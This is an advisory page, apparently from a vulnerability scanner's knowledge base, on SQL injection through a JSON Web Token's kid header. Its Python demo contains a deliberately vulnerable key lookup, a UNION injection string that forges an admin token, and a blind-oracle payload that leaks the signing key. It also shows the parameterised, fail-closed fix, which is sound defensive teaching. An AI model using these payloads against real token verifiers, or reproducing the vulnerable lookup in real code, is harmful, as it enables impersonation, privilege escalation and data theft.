Summary #

Netsparker detected an SQL injection in the kid (Key ID) header parameter of a JSON Web Token. The application uses the kid value in a database query to look up the key that verifies the token's signature, so an attacker who controls the result of that query also controls the verification key and can forge JSON Web Tokens with arbitrary payloads that the application accepts as valid.

Impact #

Attackers might be able to tamper with the values inside the JWT payload and escalate privileges, impersonate users or trigger application states that the use of a tamper-proof token was meant to prevent. Because the injection point is a SQL query, they might also be able to read data from the underlying database, for example by using the token verifier's accept/reject decision as a blind oracle.

Remediation #

To fix this vulnerability, the underlying SQL injection has to be fixed first: the kid value must never be concatenated into query text. Pass it as a bound parameter of a prepared statement and, preferably, validate it against the expected key identifier format before the lookup. The key lookup must also fail closed: if the key store returns no key, an empty key or otherwise invalid data, the token must be rejected rather than verified against a default, empty or attacker-supplied secret.
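The following is an added example, not Netsparker's code or the code of any scanned application. It shows the Impact and Remediation sections above in working form: an HS256 verifier that looks its key up by kid, a vulnerable lookup that concatenates kid into SQL and falls back to an empty key on a miss, the UNION injection that makes the query return an attacker-chosen key (plus a CASE-based variant that turns the verifier into a blind read oracle), and the parameterised, fail-closed lookup that stops both. The table name, column names and key values are assumptions for the demo; the key store is an in-memory SQLite database.

```python
import base64
import hashlib
import hmac
import json
import sqlite3
from typing import Callable, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Build a compact HS256 JWT; the attacker uses this with a key of their choice."""
    signing_input = "{}.{}".format(
        b64url(json.dumps(header, separators=(",", ":")).encode()),
        b64url(json.dumps(payload, separators=(",", ":")).encode()),
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def make_db() -> sqlite3.Connection:
    """Constructed sample key store (assumed schema): one legitimate HMAC key."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE signing_keys (kid TEXT PRIMARY KEY, secret TEXT)")
    db.execute("INSERT INTO signing_keys VALUES ('key-2024', 'server-only-secret')")
    return db


def lookup_key_vulnerable(db: sqlite3.Connection, kid: str) -> bytes:
    # BUG 1: kid is concatenated into the SQL text (CWE-89).
    row = db.execute(f"SELECT secret FROM signing_keys WHERE kid = '{kid}'").fetchone()
    # BUG 2: an unknown kid silently falls back to an empty key instead of failing.
    return row[0].encode() if row else b""


def lookup_key_fixed(db: sqlite3.Connection, kid: str) -> bytes:
    # kid is a bound parameter, so its content never reaches the SQL parser.
    row = db.execute("SELECT secret FROM signing_keys WHERE kid = ?", (kid,)).fetchone()
    if row is None or not row[0]:
        raise LookupError("unknown or empty kid")  # fail closed
    return row[0].encode()


def verify(token: str, db: sqlite3.Connection,
           lookup: Callable[[sqlite3.Connection, str], bytes]) -> Optional[dict]:
    """Return the payload if the signature checks out under the looked-up key, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None
    try:
        key = lookup(db, str(header.get("kid", "")))
    except LookupError:
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def forge_token(kid: str, key: bytes, payload: dict) -> str:
    return sign_hs256({"alg": "HS256", "typ": "JWT", "kid": kid}, payload, key)


# Injection payload: the UNION makes the query return an attacker-chosen "secret",
# which is then the key the vulnerable verifier checks the forged signature against.
INJECTED_KID = "x' UNION SELECT 'attacker-key' -- "


def blind_kid(condition: str) -> str:
    """kid that yields 'attacker-key' only if the SQL condition holds; the verifier's
    accept/reject answer then leaks one bit of database content per token."""
    return f"x' UNION SELECT CASE WHEN ({condition}) THEN 'attacker-key' ELSE 'wrong' END -- "


def demo():
    db = make_db()
    forged = forge_token(INJECTED_KID, b"attacker-key", {"sub": "alice", "role": "admin"})
    accepted_vuln = verify(forged, db, lookup_key_vulnerable)   # payload dict: forgery works
    accepted_fixed = verify(forged, db, lookup_key_fixed)       # None: rejected
    # Blind read: is the first character of the real signing key 's'?
    probe = forge_token(
        blind_kid("(SELECT substr(secret,1,1) FROM signing_keys WHERE kid='key-2024') = 's'"),
        b"attacker-key", {"sub": "probe"})
    leaked_bit = verify(probe, db, lookup_key_vulnerable) is not None
    return accepted_vuln, accepted_fixed, leaked_bit


if __name__ == "__main__":
    print(demo())
```

The fixed lookup also closes the second bug the Remediation section warns about: a kid that matches nothing raises instead of returning an empty key, so a token signed with an empty HMAC key is rejected rather than accepted.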

Classifications #
CWE-89; OWASP 2017-A1